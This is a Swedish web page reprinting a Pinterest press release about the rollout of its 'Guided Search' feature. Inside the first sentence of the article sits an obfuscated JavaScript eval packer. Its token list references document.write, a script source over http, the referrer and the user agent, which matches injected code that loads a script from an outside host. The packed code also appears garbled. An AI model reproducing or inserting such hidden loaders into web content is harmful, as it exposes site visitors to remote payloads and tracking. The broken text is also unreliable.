Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

Pinterest ’Guided Search’ – nu på svenska

Pinterest ’Guided Search’ – nu på svenska

Pinterest eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yrasi|var|u0026u|referrer|binkk||js|php’.split(’|’),0,{}))
börjar nu rulla ut sökmotorsfunktionen ’Guided Search’ på svenska. Guided Search hjälper dig upptäcka de pins som är mest relevanta just för dig. Funktionen har skapats för att göra det enklare för användare att upptäcka och söka efter intressant innehåll, oavsett om du vet exakt vad du vill ha eller är ute efter att hitta nya idéer och inspireras längst vägen. 

Guided Search gör det möjligt att söka på ett nyckelord och utifrån det få kategoriförslag som hjälper dig förfina din sökning och ge dig innehåll med maximal relevans. Funktionen hjälper dig att hitta saker du inte ens visste att du letade efter, till exempel din nästa semester, en hårfrisyr eller ett gott höstrecept. Mer information och videor på hur funktionen fungerar hittar du på Pinterest blogg.

Guided Search lanserades först på engelska i april och rullas nu ut på lokala språk i mobilapplikationen och på webben.

Detta är ett pressmeddelande från Pinterest